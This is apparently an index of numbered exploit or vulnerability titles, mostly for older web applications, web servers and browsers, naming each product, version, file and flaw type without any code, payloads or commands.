[28441] IwebNegar 1.1 Comments.PHP SQL Injection Vulnerability
[28392] Zen Cart Web Shopping Cart 1.x autoload_func.php autoLoadConfig[999][0][loadFile] Parameter Remote File Inclusion
[28379] WEBinsta Mailing List Manager 1.3 Install3.PHP Remote File Include Vulnerability
[28378] MyWebland miniBloggie 1.0 Fname Remote File Include Vulnerability
[28372] Tiny Web Gallery 1.5 Image Parameter Multiple Remote File Include Vulnerabilities
[28349] TurnkeyWebTools PHP Simple Shop 2.0 - Multiple Remote File Include Vulnerabilities
[28334] Sophos Web Protection Appliance sblistpack Arbitrary Command Execution
[28332] Sophos Web Protection Appliance clear_keys.pl Local Privilege Escalation
[28300] Advanced Webhost Billing System 2.2.2 Contact.PHP Multiple Cross-Site Scripting Vulnerabilities
[28299] Microsoft Windows XP/2000/2003 Graphical Device Interface Plus Library Denial of Service Vulnerability
[28277] Opera Web Browser 9 CSS Background URI Memory Corruption Vulnerability
[28193] Webvizyon SayfalaAltList.ASP SQL Injection Vulnerability
[28175] Sophos Web Protection Appliance - Multiple Vulnerabilities
[28165] Apple Safari Web Browser 2.0.4 DHTML SetAttributeNode() Null Dereference Denial of Service Vulnerability
[28161] PHPWebGallery 1.x Comments.PHP Cross-site Scripting Vulnerability
[28008] Adaptive Website Framework 1.11 Remote File Include Vulnerability
[28005] Microsoft Exchange Server 2000/2003 Outlook Web Access Script Injection Vulnerability
[27922] EVA-Web 2.1.2 index.php Multiple Parameter XSS
[27921] EVA-Web 2.1.2 rubrique.php3 date Parameter XSS
[27920] EVA-Web 2.1.2 article-album.php3 debut_image Parameter XSS
[27899] JemWeb DownloadControl 1.0 DC.PHP SQL Injection Vulnerability
[27887] SAP Web Application Server 6.x/7.0 Input Validation Vulnerability
[27830] Multiple Cisco Products WebSense Content Filtering Bypass Vulnerability
[27770] Blog 0.2.3/0.2.4 Mod Weblog_posting.PHP SQL Injection Vulnerability
[27752] Graphite Web Unsafe Pickle Handling
[27735] PHPWebFTP 2.3 - Multiple Cross-Site Scripting Vulnerabilities
[27716] Asterisk Recording Interface 0.7.15 Audio.PHP Information Disclosure Vulnerability
[27713] Manic Web MWGuest 2.1 MWguest.PHP HTML Injection Vulnerability
[27655] Copy to WebDAV 1.1 iOS - Multiple Vulnerabilities
[27651] Tiny Web Gallery 1.4 Index.PHP Cross-Site Scripting Vulnerability
[27641] Opera Web Browser 8.52 Stylesheet Attribute Buffer Overflow Vulnerability
[27607] MiniWeb (Build 300) Arbitrary File Upload
[27590] APT-webshop 3.0/4.0 Modules.PHP Multiple SQL Injection Vulnerabilities
[27588] PhpWebGallery 1.4.1 picture.php Multiple Parameter XSS
[27587] PhpWebGallery 1.4.1 category.php Multiple Parameter XSS
[27583] TalentSoft Web+ Shop 5.0 Deptname Parameter Cross-Site Scripting Vulnerability
[27582] AWeb's Banner Generator 3.0 Cross-Site Scripting Vulnerability
[27562] Web-APP.net WebAPP 0.9.x mods/calendar/index.cgi vsSD Parameter XSS
[27561] Web-APP.net WebAPP 0.9.x index.cgi Multiple Parameter XSS
[27560] aWebNews 1.2 visview.php _GET['cid'] Parameter SQL Injection
[27554] MinaliC Webserver 2.0.0 - Buffer Overflow (Egghunter)
[27487] Web Host Automation Ltd. Helm 3.2.10 beta default.asp Multiple Parameter XSS
[27486] Web Host Automation Ltd. Helm 3.2.10 beta domains.asp txtDomainName Parameter XSS
[27478] Maian Weblog 2.0 mail.php Multiple Parameter SQL Injection
[27477] Maian Weblog 2.0 print.php Multiple Parameter SQL Injection
[27457] 1WebCalendar 4.0 mainCal.cfm SQL Injection
[27456] 1WebCalendar 4.0 /news/newsView.cfm NewsID Parameter SQL Injection
[27455] 1WebCalendar 4.0 viewEvent.cfm EventID Parameter SQL Injection
[27454] Motorola Bluetooth Interface Dialog Spoofing Vulnerability
[27449] phpWebsite 0.8.2/0.8.3 article.php sid Parameter SQL Injection
[27448] phpWebsite 0.8.2/0.8.3 friend.php sid Parameter SQL Injection
[27378] Easy File Sharing Web Server 3.2 Full Path Request Arbitrary File Upload
[27377] Easy File Sharing Web Server 3.2 Format String DoS
[27324] Archangel Weblog 0.90.2 Authentication Bypass Vulnerability
[27312] FreeHostShop Website Generator 3.3 - Arbitrary File Upload Vulnerability
[27298] Web Calendar Pro Dropbase.PHP SQL Injection Vulnerability
[27284] INSTEON Hub 2242-222 - Lack of Web and API Authentication
[27266] Dragonfly CMS 9.0.6 .1 Web_Links Module Multiple Parameter XSS
[27248] Webpagecity WPC easy 0 SQL Injection Vulnerability
[27247] E107 Website System 0.7.2 Chatbox Plugin HTML Injection Vulnerability
[27245] V-webmail 1.6.2 - Multiple Cross-Site Scripting Vulnerabilities
[27189] WebDisk 3.0.2 PhotoViewer iOS - Command Execution Vulnerability
[27169] Webeveyn Whomp! Real Estate Manager 2005 Login SQL Injection Vulnerability
[27149] Ashwebstudio Ashnews 0.83 Cross-Site Scripting Vulnerability
[27136] Symantec Web Gateway 5.1.0.x - Multiple Vulnerabilities
[27114] WebspotBlogging 3.0 Login.PHP SQL Injection Vulnerability
[27109] Phpclanwebsite 1.23.1 BBCode IMG Tag Script Injection Vulnerability
[27079] Web Host Automation Ltd. Helm 3.2.8 ForgotPassword.ASP Cross-Site Scripting Vulnerability
[27064] Orjinweb Index.PHP Remote File Include Vulnerability
[27063] WebWiz Forums Search_form.ASP Cross-Site Scripting Vulnerability
[27037] TheWebForum 1.2.1 - Multiple Input Validation Vulnerabilities
[27017] Chimera Web Portal 0.2 linkcategory.php id Parameter SQL Injection
[27016] Chimera Web Portal 0.2 modules.php Multiple Parameter XSS
[27000] VEGO Web Forum 1.x Theme_ID SQL Injection Vulnerability
[26991] Web Wiz Multiple Products SQL Injection Vulnerability
[26984] IceWarp Universal WebMail /mail/include.html - Crafted HTTP_USER_AGENT Arbitrary File Access
[26983] IceWarp Universal WebMail /mail/index.html lang_settings Parameter Remote File Inclusion
[26982] IceWarp Universal WebMail /mail/settings.html Language Parameter Local File Inclusion
[26981] IceWarp Universal WebMail /dir/include.html lang Parameter Local File Inclusion
[26980] IceWarp Universal WebMail /admin/inc/include.php Multiple Parameter Remote File Inclusion
[26979] IceWarp Universal WebMail /accounts/inc/include.php Multiple Parameter Remote File Inclusion
[26978] Dev Web Management System 1.5 add.php Multiple Parameter XSS
[26977] Dev Web Management System 1.5 download_now.php target Parameter SQL Injection
[26976] Dev Web Management System 1.5 getfile.php cat Parameter SQL Injection
[26882] Hot Banana Web Content Management Suite 5.3 Cross-Site Scripting Vulnerability
[26866] Round Cube Webmail 0.1 -20051021 Path Disclosure Weakness
[26865] WebCal 3.0 4 webcal.cgi Multiple Parameter XSS
[26864] WebGlimpse 2.x Cross-Site Scripting Vulnerability
[26841] MarmaraWeb E-Commerce Remote File Include Vulnerability
[26838] MarmaraWeb E-commerce index.php page Parameter XSS
[26812] PHP Web Scripts Ad Manager Pro 2.0 Advertiser_statistic.PHP SQL Injection Vulnerability
[26792] PhpWebGallery 1.3.4/1.5.1 picture.php image_id Parameter SQL Injection
[26791] PhpWebGallery 1.3.4/1.5.1 category.php search Parameter SQL Injection
[26790] PhpWebGallery 1.3.4/1.5.1 comments.php Multiple Parameter SQL Injection
[26784] BTGrup Admin WebController SQL Injection Vulnerability
[26730] Web4Future Portal Solutions Arhiva.PHP Directory Traversal Vulnerability
[26729] Web4Future Affiliate Manager PRO 4.1 Functions.PHP SQL Injection Vulnerability
[26728] Web4Future Portal Solutions Comentarii.PHP SQL Injection Vulnerability
[26727] Web4Future eDating Professional 5.0 fq.php cid Parameter SQL Injection
[26726] Web4Future eDating Professional 5.0 articles.php cat Parameter SQL Injection
[26725] Web4Future eDating Professional 5.0 gift.php cid Parameter SQL Injection
[26724] Web4Future eDating Professional 5.0 index.php Multiple Parameter SQL Injection
[26719] Web4Future eCommerce Enterprise Edition 2.1 viewbrands.php bid Parameter SQL Injection
[26718] Web4Future eCommerce Enterprise Edition 2.1 index.php Multiple Parameter SQL Injection
[26717] Web4Future eCommerce Enterprise Edition 2.1 view.php Multiple Parameter SQL Injection
[26691] WebCalendar 1.0.1 Layers_Toggle.PHP HTTP Response Splitting Vulnerability
[26687] WebCalendar 1.0.1 - Multiple SQL Injection Vulnerabilities
[26664] Multiple D-Link Devices - OS-Command Injection via UPnP Interface
[26636] PHP Web Statistik 1.4 Content Injection Vulnerabilities
[26635] FreeWebStat 1.0 - Multiple Cross-Site Scripting Vulnerabilities
[26618] AllWeb Search 3.0 - SQL Injection Vulnerability
[26598] Athena PHP Website Administration 0.1 - Remote File Include Vulnerability
[26583] SoftBiz Web Hosting Directory Script 1.1 email.php h_id Parameter SQL Injection
[26582] SoftBiz Web Hosting Directory Script 1.1 browsecats.php cid Parameter SQL Injection
[26581] SoftBiz Web Hosting Directory Script 1.1 review.php sbres_id Parameter SQL Injection
[26580] SoftBiz Web Hosting Directory Script 1.1 search_result.php cid Parameter SQL Injection
[26531] Opera Web Browser 8.0/8.5 HTML Form Status Bar Misrepresentation Vulnerability
[26500] PHPWebThings 1.4 Download.PHP File Parameter SQL Injection Vulnerability
[26488] SAP Web Application Server 6.x/7.0 URI Redirection Vulnerability
[26487] SAP Web Application Server 6.x/7.0 frameset.htm sap-syscmd Parameter XSS
[26486] SAP Web Application Server 6.x/7.0 Error Page XSS
[26470] JPortal Web Portal 2.2.1/2.3.1 news.php id Parameter SQL Injection
[26469] JPortal Web Portal 2.2.1/2.3.1 comment.php id Parameter SQL Injection
[26460] Asus VideoSecurity Online 3.5 Web Server Authentication Buffer Overflow Vulnerability
[26459] phpWebThings 0.4.4 Forum.PHP Cross-Site Scripting Vulnerability
[26344] WebGUI 6.x Arbitrary Command Execution Vulnerability
[26311] IceWarp Web Mail 5.5.1 calendar_w.html createdataCX Parameter XSS
[26310] IceWarp Web Mail 5.5.1 calendar_m.html createdataCX Parameter XSS
[26309] IceWarp Web Mail 5.5.1 calendar_d.html createdataCX Parameter XSS
[26308] IceWarp Web Mail 5.5.1 blank.html id Parameter XSS
[26270] Content2Web 1.0.1 - Multiple Input Validation Vulnerabilities
[26263] AEwebworks aeDating 3.2/4.0 Search_Result.PHP SQL Injection Vulnerability
[26236] Stylemotion WEB//NEWS 1.4 print.php id Parameter SQL Injection
[26235] Stylemotion WEB//NEWS 1.4 news.php Multiple Parameter SQL Injection
[26234] Stylemotion WEB//NEWS 1.4 startup.php Cookie SQL Injection
[26230] Microsoft IIS 5.1 WebDAV HTTP Request Source Code Disclosure Vulnerability
[26201] PHPWebNotes 2.0 Api.PHP Remote File Include Vulnerability
[26200] SqWebMail 5.0 .4 HTML Email IMG Tag Script Injection Vulnerability
[26197] Foojan PHPWeblog Html Injection Vulnerability
[26196] BEA WebLogic 7.0/8.1 Administration Console Cross-Site Scripting Vulnerability
[26193] SaveWebPortal 3.4 - Multiple Directory Traversal Vulnerabilities
[26192] SaveWebPortal 3.4 - Multiple Cross Site Scripting Vulnerabilities
[26191] SaveWebPortal 3.4 - Multiple Remote File Include Vulnerabilities
[26190] SaveWebPortal 3.4 Unauthorized Access Vulnerability
[26152] Apple Mac OS X 10.4 Weblog Server Cross-Site Scripting Vulnerabilities
[26128] Apple Safari 1.3 Web Browser JavaScript Invalid Address Denial of Service Vulnerability
[26123] Java Web Start Double Quote Injection Remote Code Execution
[26105] E107 Website System 0.6 Attached File Cross-Site Scripting Vulnerability
[26071] NetworkActiv Web Server 1.0/2.0/3.0/3.5 Cross-Site Scripting Vulnerability
[26068] Web Content Management List.php strTable Parameter XSS
[26067] Web Content Management validsession.php strRootpath Parameter XSS
[26032] SPI Dynamics WebInspect 5.0.196 Cross Application Script Injection Vulnerability
[26009] AfterLogic WebMail Lite PHP 7.0.1 - CSRF Vulnerability
[26001] Novell GroupWise 6.5 WebAccess HTML Injection Vulnerability
[25995] e107 Website System 0.6 Nested BBCode URL Tag Script Injection Vulnerability
[25979] Oracle WebCenter Content CheckOutAndOpen.dll ActiveX Remote Code Execution
[25945] phpWebsite 0.7.3/0.8.x/0.9.x Index.PHP Directory Traversal Vulnerability
[25914] Dynamic Biz Website Builder (QuickWeb) 1.0 Login.ASP SQL Injection Vulnerability
[25836] Intrasrv Simple Web Server 1.0 - SEH Based Remote Code Execution
[25790] WWWeb Concepts Events System 1.0 LOGIN.ASP SQL Injection Vulnerability
[25788] Popper Webmail 1.41 ChildWindow.Inc.PHP Remote File Include Vulnerability
[25787] LiteWeb Server 2.5 Authentication Bypass Vulnerability
[25781] NEXTWEB (i)Site Login.ASP SQL Injection Vulnerability
[25739] BEA WebLogic 7.0/8.1 Administration Console Error Page Cross-Site Scripting Vulnerability
[25738] BEA WebLogic 7.0/8.1 Administration Console LoginForm.jsp Cross-Site Scripting Vulnerability
[25715] HP LaserJet Pro P1606dn - Webadmin Password Reset
[25713] SIEMENS Solid Edge ST4/ST5 WebPartHelper ActiveX - RFMSsvs!JShellExecuteEx RCE
[25709] Gentoo Webapp-Config 1.10 Insecure File Creation Vulnerability
[25668] Sigma ISP Manager 6.6 Sigmaweb.DLL SQL Injection Vulnerability
[25651] MaxWebPortal 1.3x post.asp Multiple Parameter XSS
[25645] e107 Website System 0.617 Forum_viewforum.PHP SQL Injection Vulnerability
[25644] e107 Website System 0.617 Request.PHP Directory Traversal Vulnerability
[25626] 4D WebStar 5.3/5.4 Tomcat Plugin Remote Buffer Overflow Vulnerability
[25592] WebCrossing WebX 5.0 Cross-Site Scripting Vulnerability
[25589] MaxWebPortal 1.3 custom_link.asp Multiple Parameter SQL Injection
[25588] MaxWebPortal 1.3 dl_toprated.asp SQL Injection
[25587] MaxWebPortal 1.3 pic_popular.asp SQL Injection
[25586] MaxWebPortal 1.3 links_popular.asp SQL Injection
[25585] MaxWebPortal 1.3 dl_popular.asp SQL Injection
[25573] Video Cam Server 1.0 Administrative Interface Authentication Bypass Vulnerability
[25567] Just William's Amazon Webstore HTTP Response Splitting Vulnerability
[25566] Just William's Amazon Webstore CurrentNumber Parameter Cross-Site Scripting Vulnerability
[25565] Just William's Amazon Webstore SearchFor Parameter Cross-Site Scripting Vulnerability
[25564] Just William's Amazon Webstore CurrentIsExpanded Parameter Cross-Site Scripting Vulnerability
[25563] Oracle Application Server 9i Webcache PartialPageErrorPage Cross-Site Scripting Vulnerability
[25562] Oracle Application Server 9i Webcache Cache_dump_file Cross-Site Scripting Vulnerability
[25561] Oracle Application Server 9i Webcache Arbitrary File Corruption Vulnerability
[25560] Just William's Amazon Webstore Closeup.PHP Image Parameter Cross-Site Scripting Vulnerability
[25546] BEA WebLogic Server 8.1 And WebLogic Express Administration Console Cross-Site Scripting Vulnerability
[25534] SQWebmail 3.x/4.0 HTTP Response Splitting Vulnerability
[25421] RSA Security RSA Authentication Agent For Web 5.2 - Remote Cross-Site Scripting Vulnerability
[25420] IBM WebSphere 5.0/5.1/6.0 Application Server Web Server Root JSP Source Code Disclosure Vulnerability
[25418] MiniWeb MiniWeb HTTP Server (build 300) - Crash PoC
[25381] WebCT Discussion Board 4.1 HTML Injection Vulnerability
[25360] PHP-Nuke 7.6 Web_Links Module Multiple SQL Injection Vulnerabilities
[25353] IBM Lotus Domino Server 6.5.1 Web Service Remote Denial of Service Vulnerability
[25350] WebWasher CSM 4.4.1 Build 752 Conf Script Cross-Site Scripting Vulnerability
[25342] PHP-Nuke 7.6 Web_Links Module Multiple Cross-Site Scripting Vulnerabilities
[25319] FastStone 4in1 Browser 1.2 Web Server Remote Directory Traversal Vulnerability
[25274] Maxthon Web Browser 1.2 Search Bar Information Disclosure Vulnerability
[25249] Webid 1.0.6 - Multiple Vulnerabilities
[25231] Microsoft Windows 2000/2003/XP Graphical Device Interface Library Denial of Service Vulnerability
[25207] py software active webcam webserver 4.3/5.5 - Multiple Vulnerabilities
[25193] Jason Hines PHPWebLog 0.4/0.5 - Remote File Include Vulnerability
[25163] CIS WebServer 3.5.13 Remote Directory Traversal Vulnerability
[25161] PHPWebSite 0.x Image File Processing Remote Arbitrary PHP File Upload Vulnerability
[25146] OpenConnect WebConnect 6.4/6.5 jretest.html Traversal Arbitrary File Access
[25133] xinkaa web station 1.0.3 - Directory Traversal vulnerability
[25113] WebCalendar 0.9.45 SQL Injection Vulnerability
[25084] Microsoft Outlook 2003 Web Access Login Form Remote URI Redirection Vulnerability
[25075] Eternal Lines Web Server 1.0 - Remote Denial of Service Vulnerability
[25071] Captaris Infinite Mobile Delivery Webmail 2.6 Path Disclosure Vulnerability
[25069] IceWarp Web Mail 5.3 accountsettings_add.html accountid Parameter XSS
[25068] IceWarp Web Mail 5.3 login.html username Parameter XSS
[25067] alt-n webadmin 3.0.2 - Multiple Vulnerabilities
[25066] WebWasher Classic 2.2/2.3 HTTP CONNECT Unauthorized Access
[25023] PGN2WEB 0.3 - Buffer Overflow Vulnerability
[25017] UML_Utilities User-Mode Linux uml_utilities 20030903 UML_Net Slip Network Interface Denial of Service Vulnerability
[24966] Java Web Start Launcher ActiveX Control - Memory Corruption
[24964] Oracle WebCenter Sites Satellite Server - HTTP Header Injection
[24958] MinaliC Webserver 2.0.0 - Buffer Overflow
[24953] Free Monthly Websites 2.0 - Admin Password Change
[24950] KNet Web Server 1.04b - Stack Corruption BoF
[24932] Sophos Web Protection Appliance 3.7.8.1 - Multiple Vulnerabilities
[24905] v0pCr3w Web Shell - Remote Code Execution
[24903] STUNSHELL Web Shell Remote Code Execution
[24902] STUNSHELL Web Shell Remote PHP Code Execution
[24897] KNet Web Server 1.04b - Buffer Overflow SEH
[24843] Apple Safari Web Browser 1.x HTML Form Status Bar Misrepresentation Vulnerability
[24842] IWebNegar Multiple SQL Injection Vulnerabilities
[24828] Opera Web Browser 7.54 KDE KFMCLIENT Remote Command Execution Vulnerability
[24822] PhpGedView 2.5/2.6 Gdbi_interface.PHP Cross-Site Scripting Vulnerability
[24806] darryl burgdorf weblibs 1.0 - Directory Traversal vulnerability
[24781] Mozilla Camino Web Browser 0.7/0.8 Infinite Array Sort Denial of Service Vulnerability
[24780] Apple Safari Web Browser 1.x Infinite Array Sort Denial of Service Vulnerability
[24771] KorWeblog 1.6.2 - Remote Directory Listing Vulnerability
[24758] opera web browser 7.54 java implementation Multiple Vulnerabilities (4)
[24757] opera web browser 7.54 java implementation Multiple Vulnerabilities (3)
[24756] opera web browser 7.54 java implementation Multiple Vulnerabilities (2)
[24755] opera web browser 7.54 java implementation Multiple Vulnerabilities (1)
[24742] Web Cookbook - Multiple SQL Injection Vulnerabilities
[24736] PHPWebSite 0.7.3/0.8.x/0.9.3 User Module HTTP Response Splitting Vulnerability
[24730] 04webserver 1.42 Multiple Vulnerabilities
[24729] webcalendar 0.9.x Multiple Vulnerabilities
[24717] WebHost Automation Helm Control Panel 3.1.x Multiple Input Validation Vulnerabilities
[24716] Apple Safari 1.2 Web Browser TABLE Status Bar URI Obfuscation Weakness
[24713] Global Spy Software Cyber Web Filter 2 IP Filter Bypass Vulnerability
[24666] Microsoft ASP.NET 1.x URI Canonicalization Unauthorized Web Access Vulnerability
[24574] Webmin 1.x HTML Email Command Execution Vulnerability
[24542] Rix4Web Portal - Blind SQL Injection Vulnerability
[24531] Web Cookbook Multiple Vulnerability
[24454] Free Monthly Websites 2.0 - Multiple Vulnerabilities
[24433] php weby directory software 1.2 - Multiple Vulnerabilities
[24426] Opera Web Browser 7.23 Empty Embedded Object JavaScript Denial of Service Vulnerability
[24425] phpWebsite 0.7.3/0.8.x/0.9.x Comment Module CM_pid XSS
[24420] Web Animations Password Protect Multiple Input Validation Vulnerabilities
[24419] Xedus Web Server 1.0 Traversal Arbitrary File Access
[24418] Xedus Web Server 1.0 testgetrequest.x username Parameter XSS
[24417] Xedus Web Server 1.0 test.x username Parameter XSS
[24408] Web-APP.Org WebAPP 0.8/0.9.x Directory Traversal Vulnerability
[24394] Opera Web Browser 7.23 JavaScript Denial of Service Vulnerability
[24387] Nihuo Web Log Analyzer 1.6 HTML Injection Vulnerability
[24376] Opera Web Browser 7.5 Resource Detection Weakness
[24367] IceWarp Web Mail 3.3.2/5.2.7 - Multiple Remote Input Validation Vulnerabilities
[24363] clearswift mimesweeper for web 4.0/5.0 - Directory Traversal vulnerability
[24352] Free Web Chat Initial Release Connection Saturation DoS
[24351] Free Web Chat Initial Release UserManager.java Null Pointer DoS
[24344] U.S. Robotics USR808054 Wireless Access Point Web Administration Denial of Service Vulnerability
[24342] Webcam Corp Webcam Watchdog 4.0.1 sresult.exe Cross-Site Scripting Vulnerability
[24325] Opera Web Browser 7.53 Location Replace URI Obfuscation Weakness
[24321] Movable Type 4.2x, 4.3x Web Upgrade Remote Code Execution
[24306] EasyWeb 1.0 FileManager Module Directory Traversal Vulnerability
[24300] Leigh Business Enterprises Web HelpDesk 4.0 - SQL Injection Vulnerability
[24298] Internet Software Sciences Web+Center 4.0.1 Cookie Object SQL Injection Vulnerability
[24295] Adult Webmaster Script Password Disclosure Vulnerability
[24291] Outblaze Webmail 0 HTML Injection Vulnerability
[24289] Artmedic Webdesign Kleinanzeigen Script File Include Vulnerability
[24282] Gattaca Server 2003 web.tmpl Language Variable CPU Consumption DoS
[24262] Opera Web Browser 7.5x IFrame OnLoad Address Bar URL Obfuscation Weakness
[24254] BasiliX Webmail 1.1 Email Header HTML Injection Vulnerability
[24252] fastream netfile ftp/web server 6.5/6.7 - Directory Traversal vulnerability
[24248] IBM WebSphere Caching Proxy Server 5.0 2 Denial of Service Vulnerability
[24244] Netegrity IdentityMinder Web Edition 5.6 Null Byte XSS
[24243] IBM Lotus Domino Server 6 - Web Access Remote Denial of Service Vulnerability
[24231] ArbitroWeb PHP Proxy 0.5/0.6 Cross-Site Scripting Vulnerability
[24227] SqWebMail 4.0.4 .20040524 Email Header HTML Injection Vulnerability
[24214] Web Wiz Forums 7.x Registration_Rules.ASP Cross-Site Scripting Vulnerability
[24197] Linksys Web Camera Software 2.10 Next_file Parameter Cross-Site Scripting Vulnerability
[24177] NetWin SurgeMail 1.8/1.9/2.0,WebMail 3.1 Login Form XSS
[24176] NetWin SurgeMail 1.8/1.9/2.0,WebMail 3.1 Error Message Path Disclosure
[24175] Linksys Web Camera Software 2.10 Next_file Parameter File Disclosure Vulnerability
[24164] Rit Research Labs TinyWeb 1.9.2 Unauthorized Script Disclosure Vulnerability
[24154] e107 website system 0.6 "email article to a friend" Feature XSS
[24153] e107 website system 0.6 usersettings.php avmsg Parameter XSS
[24138] e107 Website System 0.5/0.6 Log.PHP HTML Injection Vulnerability
[24131] dsm light web file browser 2.0 - Directory Traversal vulnerability
[24124] VBulletin 1.0/2.x/3.0 Index.PHP User Interface Spoofing Weakness
[24116] Internet Explorer 5,Firefox 0.8,OmniWeb 4.x URI Protocol Handler Arbitrary File Creation/Modification Vulnerability
[24107] EMule Web 0.42 Control Panel Denial of Service Vulnerability
[24106] Open WebMail 1.x/2.x Remote Command Execution Variant Vulnerability
[24100] Adam Webb NukeJokes 1.7/2.0 Module modules.php jokeid Parameter SQL Injection
[24099] Adam Webb NukeJokes 1.7/2.0 Module Multiple Parameter XSS
[24097] MyWeb HTTP Server 3.3 GET Request Buffer Overflow Vulnerability
[24094] SurgeLDAP 1.0 Web Administration Authentication Bypass Vulnerability
[24077] Business Objects Crystal Reports 9/10 Web Form Viewer Directory Traversal Vulnerability
[24039] NewsTraXor Website Management Script 2.9 beta Database Disclosure Vulnerability
[23999] Neon WebDAV Client Library 0.2x Format String Vulnerabilities
[23997] WeBid 1.0.6 - SQL Injection Vulnerability
[23993] websitebaker add-on concert calendar 2.1.4 - Multiple Vulnerabilities
[23968] Advantech WebAccess HMI/SCADA Software Persistence XSS Vulnerability
[23927] Opera Web Browser 7.0 - Remote IFRAME Denial of Service Vulnerability
[23925] Kerio Personal Firewall 4.0.x Web Filtering Remote Denial of Service Vulnerability
[23911] Microsoft Internet Explorer 6.0 MSWebDVD Object Denial of Service Vulnerability
[23910] F-Secure BackWeb 6.31 Local Privilege Escalation Vulnerability
[23907] Aborior Encore Web Forum Remote Arbitrary Command Execution Vulnerability
[23893] WebCT Campus Edition 3.8/4.x HTML Injection Vulnerability
[23886] simple webserver 2.3-rc1 - Directory Traversal
[23880] HP Web Jetadmin 7.5.2456 Remote Arbitrary Command Execution Vulnerability
[23879] HP Web Jetadmin 7.5.2456 setinfo.hts Script Directory Traversal Vulnerability
[23878] HP Web Jetadmin 7.5.2456 Printer Firmware Update Script Arbitrary File Upload Weakness
[23875] Trend Micro Interscan Viruswall localweb Directory Traversal Vulnerability
[23864] xweb 1.0 - Directory Traversal vulnerability
[23837] IBM Lotus Domino 6.5.1 HTTP webadmin.nsf Quick Console Cross-Site Scripting Vulnerability
[23836] IBM Lotus Domino 6/7 HTTP webadmin.nsf Directory Traversal Vulnerability
[23810] Emumail EMU Webmail 5.2.7 emumail.fcgi Multiple Parameter XSS
[23809] Emumail EMU Webmail 5.2.7 nit.emu Information Disclosure
[23803] Pegasi Web Server 0.2.2 Error Page XSS
[23802] Pegasi Web Server 0.2.2 Arbitrary File Access
[23794] PWebServer 0.3.x Remote Directory Traversal Vulnerability
[23789] SureCom EP-9510AX/EP-4504AX Network Device Malformed Web Authorization Request Denial of Service Vulnerability (2)
[23788] SureCom EP-9510AX/EP-4504AX Network Device Malformed Web Authorization Request Denial of Service Vulnerability (1)
[23776] Software602 602Pro LAN Suite Web Mail Cross-Site Scripting Vulnerability
[23758] gweb http server 0.5/0.6 - Directory Traversal vulnerability
[23741] Proxy-Pro Professional GateKeeper 4.7 Web Proxy Buffer Overrun Vulnerability
[23729] WebCortex WebStores2000 Error.ASP Cross-Site Scripting Vulnerability
[23717] Microsoft Windows XP Help And Support Center Interface Spoofing Weakness
[23713] Vizer Web Server 1.9.1 - Remote Denial of Service Vulnerability
[23677] MaxWebPortal 1.3x Personal Message SendTo Parameter XSS
[23676] MaxWebPortal 1.3x down.asp HTTP_REFERER XSS
[23648] Web Crossing Web Server 4.0/5.0 Component Remote Denial of Service Vulnerability
[23629] Leif M. Wright Web Blog 1.1 - Remote Command Execution Vulnerability
[23613] Leif M. Wright Web Blog 1.1 File Disclosure Vulnerability
[23612] BRS WebWeaver 1.0.7 ISAPISkeleton.dll Cross-Site Scripting Vulnerability
[23604] Antologic Antolinux 1.0 Administrative Interface NDCR Parameter Remote Command Execution
[23597] borland web server for corel paradox 1.0 b3 - Directory Traversal vulnerability
[23590] Reptile Web Server Reptile Web Server 20020105 Denial of Service Vulnerability
[23589] Novell Netware Enterprise Web Server 5.1/6.0 - Multiple XSS Vulnerabilities
[23588] Novell Netware Enterprise Web Server 5.1/6.0 SnoopServlet Information Disclosure
[23587] Novell Netware Enterprise Web Server 5.1/6.0 snoop.jsp Information Disclosure
[23586] Novell Netware Enterprise Web Server 5.1/6.0 env.bas Information Disclosure
[23563] Darkwet Network WebcamXP 1.6.945 Cross-Site Scripting Vulnerability
[23557] aiptek netcam webserver 0.93.15 - Directory Traversal vulnerability
[23556] GetWare Web Server Component Content-Length Value Remote Denial of Service Vulnerability
[23555] GoAhead WebServer 2.1.x Directory Management Policy Bypass Vulnerability
[23546] phpShop Web Shopping Cart 0.6.1 -b Multiple Function XSS
[23535] DansGuardian Webmin Module 0.x Edit.CGI Remote Directory Traversal Vulnerability
[23534] Hand-Crafted Software FreeProxy 3.5/3.6 - FreeWeb CreateFile Function Denial of Service Vulnerability
[23532] Hand-Crafted Software FreeProxy 3.5/3.6 - FreeWeb Directory Traversal Vulnerability
[23528] Edimax AR-6004 ADSL Router Management Interface Cross-Site Scripting Vulnerability
[23527] ZyXEL ZyWALL 10 Management Interface Cross-Site Scripting Vulnerability
[23514] Webcam Corp Webcam Watchdog 1.0/1.1/3.63 Web Server Buffer Overflow Vulnerability
[23513] Athena Web Registration Remote Command Execution Vulnerability
[23500] InduSoft Web Studio ISSymbol.ocx InternationalSeparator() Heap Overflow
[23474] Webfroot Shoutbox 2.32 Viewshoutbox.PHP Cross-Site Scripting Vulnerability
[23461] dcam webcam server personal web server 8.2.5 - Directory Traversal vulnerability
[23451] PY Software Active Webcam 4.3 Webserver Cross-Site Scripting Vulnerability
[23450] PY Software Active Webcam 4.3 Webserver Directory Traversal Vulnerability
[23449] Xerox MicroServer Web Server Remote Directory Traversal Vulnerability
[23446] GoAhead Webserver 2.1.x ASP Script File Source Code Disclosure Vulnerability
[23421] calacode @mail webmail system 3.52 - Multiple Vulnerabilities
[23419] Abyss Web Server 1.0/1.1 Authentication Bypass Vulnerability
[23418] Webgate WebEye Information Disclosure Vulnerability
[23411] Websense Enterprise 4/5 Blocked Sites Cross-Site Scripting Vulnerability
[23402] Macromedia JRun 4.0 build 61650 Administrative Interface Multiple Cross-Site Scripting Vulnerabilities
[23387] netserve web server 1.0.7 - Directory Traversal vulnerability
[23381] phpWebFileManager 2.0 index.php Directory Traversal Vulnerability
[23380] WebWasher Classic 2.2/3.3 Error Message Cross-Site Scripting Vulnerability
[23379] FortiGate Firewall 2.x selector Admin Interface XSS
[23378] FortiGate Firewall 2.x listdel Admin Interface XSS
[23377] FortiGate Firewall 2.x Policy Admin Interface XSS
[23376] FortiGate Firewall 2.x dlg Admin Interface XSS
[23373] Opera Web Browser 7.x URI Handler Directory Traversal Vulnerability
[23365] telcondex simplewebserver 2.13.31027 build 3289 - Directory Traversal vulnerability
[23334] IA WebMail Server 3.0/3.1 Long GET Request Buffer Overrun Vulnerability
[23331] Web Wiz Forum 6.34/7.0/7.5 Unauthorized Private Forum Access Vulnerability
[23325] BRS WebWeaver 1.06 httpd `User-Agent` Remote Denial of Service Vulnerability
[23318] Ashley Brown iWeb Server Encoded Backslash Directory Traversal Vulnerability
[23315] BEA WebLogic 6/7/8 InteractiveQuery.jsp Cross-Site Scripting Vulnerability
